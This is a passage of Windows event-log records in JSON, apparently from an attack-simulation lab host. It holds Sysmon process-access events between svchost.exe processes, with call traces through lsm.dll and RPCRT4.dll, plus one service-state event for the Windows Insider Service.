C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:08.060","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76860,"ProcessID":856,"ThreadID":948,"Channel":"System","Message":"The Windows Insider Service service entered the running state.","param1":"Windows Insider Service","param2":"running","EventReceivedTime":"2020-08-01 07:56:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3963,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:08.107\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:08.107","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3964,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:08.107\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:08.107","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3965,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:08.107\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:08.107","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3966,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:08.107\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:08.107","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3967,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:08.107\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:08.107","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3968,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:08.107\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+10038|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:08.107","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+10038|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3969,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:08.107\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001014B90000}\r\nTargetProcessId: 1132\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\lsm.dll+b81f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:08.107","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001014B90000}","TargetProcessId":"1132","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\lsm.dll+b81f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","EventReceivedTime":"2020-08-01 07:56:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
